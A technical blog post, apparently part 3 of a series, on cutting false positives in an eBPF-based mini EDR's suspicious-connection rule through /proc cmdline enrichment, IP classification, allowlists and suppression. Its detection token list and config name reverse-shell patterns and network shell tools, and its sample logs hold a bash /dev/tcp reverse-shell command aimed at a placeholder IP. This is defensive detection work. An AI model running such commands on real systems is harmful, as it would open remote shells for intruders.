Building a Mini EDR with eBPF 3: Reducing False Positives in SUSPICIOUS_CONNECT

In part 1, I collected execve, openat, and connect through tracepoints, then connected the eBPF ring buffer to a user-space rule engine and JSON Lines writer. In part 2, I connected openat enter and exit events to distinguish /etc/shadow access attempts from successful opens.

This post moves to the network side. I do not add many new syscalls. The goal is to interpret the existing connect event more carefully.

The SUSPICIOUS_CONNECT rule in part 1 was intentionally simple. If a shell or script runtime such as bash, python3, or nc connected to a public IPv4 address, it was logged as suspicious. That was a good starting point for the MVP. But in real logs, normal automation can look similar to suspicious behavior.

For example, a python3 backup script may connect to an external storage API. A bash deployment script may connect to a package repository or health-check endpoint. An administrator may use nc for normal network testing.

So the core improvement is not to make detection broader. It is to reduce false positives by looking at the same connect event together with command line, destination IP classification, and allowlists.

A single connect event cannot prove an attack.
To improve detection quality, do not try to make every decision in the kernel.
Enrich context such as command line, destination, and allowlists in user space.

Problems in the Existing Rule

The original SUSPICIOUS_CONNECT condition was simple.

event_type == connect
comm in suspicious_process_names
dst_ip is external IPv4

This is quick to implement. The eBPF program reads sockaddr_in in sys_enter_connect, and the user-space rule engine only needs the process name and destination address.

But the limitations are clear.

  • comm is limited to 16 bytes.
  • Process names can be changed.
  • Without command line, clues such as /dev/tcp/ are missed.
  • Excluding private IPs is not enough to express organization-specific normal destinations.
  • A public IP is not automatically malicious.

Rules based only on comm can catch many normal operation scripts. The name python3 alone does not tell whether it is a backup script, a one-liner, or suspicious reverse-shell preparation.

This time, I keep the connect event itself, but enrich the context needed for user-space interpretation.

Command Line Enrichment

The current eBPF program collects only an argv0-level command line for execve. A connect event does not have a command line. Instead of trying to read the full long argv inside the kernel, I decided to read /proc/<pid>/cmdline from user space on a best-effort basis.

The flow is this.

receive connect event
  -> read /proc/<pid>/cmdline
  -> convert NUL separators to spaces
  -> reflect the result in event.cmdline for the rule engine
  -> write cmdline field to JSONL

The implementation is handled in the ring buffer callback in src/main.c. Instead of writing the kernel event directly, I create a local copy and read /proc/<pid>/cmdline only when the event is EVENT_CONNECT.

static void enrich_cmdline_from_proc(struct event *event)
{
    char path[64];
    FILE *file;
    size_t nread;

    if (event->event_type != EVENT_CONNECT || !event->pid)
        return;

    snprintf(path, sizeof(path), "/proc/%u/cmdline", event->pid);
    file = fopen(path, "rb");
    if (!file)
        return;

    nread = fread(event->cmdline, 1, sizeof(event->cmdline) - 1, file);
    fclose(file);

    event->cmdline[nread] = '\0';
    for (size_t i = 0; i < nread; i++) {
        if (event->cmdline[i] == '\0')
            event->cmdline[i] = ' ';
    }

    while (nread > 0 && event->cmdline[nread - 1] == ' ')
        event->cmdline[--nread] = '\0';
}

This enrichment is not perfect. If the process has already exited by the time the event is received, /proc/<pid>/cmdline cannot be read. It may also fail because of permissions or namespace differences. Command lines can contain sensitive information such as tokens or paths, so they should be handled carefully.

So in this project, command line enrichment is not required for detection. If it can be read, it provides more evidence. If it cannot be read, the program still makes a decision with the existing event. Enrichment failure is not detection failure. It is missing context.

Destination IP Classification

The MVP already excluded private IPs. But that decision was not visible in the log. This time, I classify the destination IPv4 address and record it as dst_ip_class in JSONL.

The basic classification is simple.

loopback: 127.0.0.0/8
private: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16
public: IPv4 addresses outside those ranges
unknown: no destination address or not interpretable

A public IP connection is logged like this.

{"event_type":"connect","dst_ip":"203.0.113.10","dst_ip_class":"public"}

A private IP connection is logged like this.

{"event_type":"connect","dst_ip":"192.168.0.10","dst_ip_class":"private"}

The purpose of this field is not to prove whether something is malicious. It is to make it easier to see why a rule matched or why it was suppressed. A public IP is not automatically malicious, and a private IP is not automatically safe. But within this post, the focus is reducing false positives in an external-connection heuristic.

Allowlist and Suppression

To reduce false positives, normal destinations and normal command lines should be expressible in config. So I added three settings to suspicious_connect in config/rules.json.

"suspicious_connect": {
  "enabled": true,
  "severity": "high",
  "process_names": ["sh", "bash", "dash", "zsh", "python", "python3", "perl", "ruby", "nc", "ncat", "socat"],
  "cmdline_tokens": ["/dev/tcp/", "bash -i", "sh -i", "python -c", "python3 -c", "perl -e", "socat ", "ncat "],
  "exclude_private_ip": true,
  "allow_dst_ips": ["1.1.1.1"],
  "allow_cmdline_prefixes": ["python3 /opt/backup/"],
  "suppression_mode": "mark"
}

allow_dst_ips defines normal destination IPs. In the example, I put 1.1.1.1 in the allowlist. allow_cmdline_prefixes defines normal command line prefixes. For example, a backup script starting with python3 /opt/backup/ is not immediately treated as a high-severity detection even if it connects to a public IP.

suppression_mode decides how to handle events matched by the allowlist.

mark: store the event with suppressed=true
drop: do not store the event

For a portfolio project, mark is better. It shows the reasoning process behind the detection tool. In production, drop may be chosen to reduce log volume, but here it is more useful for learning and explanation to leave the false-positive reduction process in the logs.

A suppressed event looks like this.

{"event_type":"connect","comm":"python3","cmdline":"python3 /opt/backup/upload.py","dst_ip":"8.8.8.8","dst_ip_class":"public","rule":null,"severity":null,"suppressed":true,"suppress_reason":"allow_cmdline_prefix"}

Private IP exclusion is also expressed in the same suppression format.

{"event_type":"connect","comm":"bash","dst_ip":"192.168.0.10","dst_ip_class":"private","rule":null,"severity":null,"suppressed":true,"suppress_reason":"private_ip"}

This makes the reason for a non-match visible directly in the log.

Improved SUSPICIOUS_CONNECT

Before the change, the rule only checked process name and whether the destination was public.

comm in suspicious_process_names
dst_ip_class == public

After the change, it checks allowlists and command line tokens together.

event_type == connect
address_family == AF_INET
dst_ip_class == public
not allow_dst_ip
not allow_cmdline_prefix
(
  comm in suspicious_process_names
  OR cmdline contains suspicious token
)

The command line token candidates are these.

  • /dev/tcp/
  • bash -i
  • sh -i
  • python -c
  • python3 -c
  • perl -e
  • socat
  • ncat

For example, this event is still recorded as SUSPICIOUS_CONNECT.

{"event_type":"connect","comm":"bash","cmdline":"bash -c exec 3<>/dev/tcp/203.0.113.10/4444","dst_ip":"203.0.113.10","dst_ip_class":"public","rule":"SUSPICIOUS_CONNECT","severity":"high","suppressed":false,"suppress_reason":null}

On the other hand, an event going to an allowlisted destination is not raised as a detection and is marked as suppressed.

{"event_type":"connect","comm":"bash","cmdline":"bash -c exec 3<>/dev/tcp/1.1.1.1/80","dst_ip":"1.1.1.1","dst_ip_class":"public","rule":null,"severity":null,"suppressed":true,"suppress_reason":"allow_dst_ip"}

A normal process connecting to a public IP is also logged without a rule match.

{"event_type":"connect","comm":"curl","cmdline":"curl https://example.com/health","dst_ip":"93.184.216.34","dst_ip_class":"public","rule":null,"severity":null,"suppressed":false,"suppress_reason":null}

This rule can still be bypassed. String-token-based detection is not perfect. Normal automation scripts may also contain similar strings. So this rule should be viewed as a way to prioritize investigation, not as a final attack verdict.

JSONL Output Changes

This change adds the following fields to connect events.

dst_ip_class
suppressed
suppress_reason
cmdline

cmdline reuses the existing field. For connect events, user space fills it by reading /proc/<pid>/cmdline.

The final connect log contains the following information in one line.

{"timestamp":123,"event_type":"connect","pid":1000,"ppid":999,"uid":1000,"gid":1000,"comm":"bash","parent_comm":"bash","cmdline":"bash -c exec 3<>/dev/tcp/203.0.113.10/4444","path":"","flags":0,"dst_ip":"203.0.113.10","dst_port":4444,"address_family":2,"mnt_ns":4026531832,"pid_ns":4026531836,"dst_ip_class":"public","suppressed":false,"suppress_reason":null,"rule":"SUSPICIOUS_CONNECT","severity":"high"}

Now the log reader does not only see that SUSPICIOUS_CONNECT was triggered. The destination classification and suppression state are visible together.

Regression Tests Based on Sample Logs

Network event collection depends on the kernel, privileges, and external network state. The rule engine changes more frequently than that. If every rule change must be verified only by running the actual eBPF program, the feedback loop becomes slow.

So I added expected-result sample JSONL files under tests/samples/.

tests/samples/connect_public_suspicious.jsonl
tests/samples/connect_private_suppressed.jsonl
tests/samples/connect_allow_dst_ip.jsonl
tests/samples/connect_allow_cmdline_prefix.jsonl
tests/samples/connect_public_normal_process.jsonl

Then tests/test_connect_samples.sh checks whether each sample has the expected fields.

jq -e 'select(.rule == "SUSPICIOUS_CONNECT" and .suppressed == false and .dst_ip_class == "public")' \
  tests/samples/connect_public_suspicious.jsonl >/dev/null

This test does not replace eBPF program testing. Kernel event collection tests and rule output shape tests are separate. But when changing rule policy, keeping expected output shapes as samples helps reduce regression risk.

Why IPv6 Is Out of Scope Here

I did not implement IPv6 in this post. Parsing sockaddr_in6 and designing a shared output format for IPv4 and IPv6 are left as future work.

The reason is simple. The core of part 3 is not to expand address family coverage. It is to interpret the already-collected connect event more carefully. If IPv6 is added at the same time, the focus of the post could drift toward collection coverage.

For now, I first organized command line enrichment, IP classification, allowlists, and suppression for IPv4.

Part 3 Summary

The SUSPICIOUS_CONNECT rule from part 1 was a simple rule that logged a shell or script runtime connecting to a public IPv4 address as suspicious. Simple rules are quick to build, but in real logs, normal automation and suspicious behavior can look similar.

In this post, I interpreted connect events more carefully by enriching command line from /proc/<pid>/cmdline in user space. I classified destination IPv4 addresses with dst_ip_class, and added allow_dst_ips, allow_cmdline_prefixes, and suppression_mode to the config.

As a result, events matched by the allowlist can keep rule=null while recording suppressed=true and a suppress_reason. On the other hand, an event is recorded as SUSPICIOUS_CONNECT when it goes to a public IP, is not allowlisted, and has either a suspicious process name or a suspicious command line token.

The goal of part 3 is not to make detection broader. It is to interpret the same events more carefully and leave logs that are worth investigating.

GitHub Repository

The code for this post is available at ebpf-guard part-3.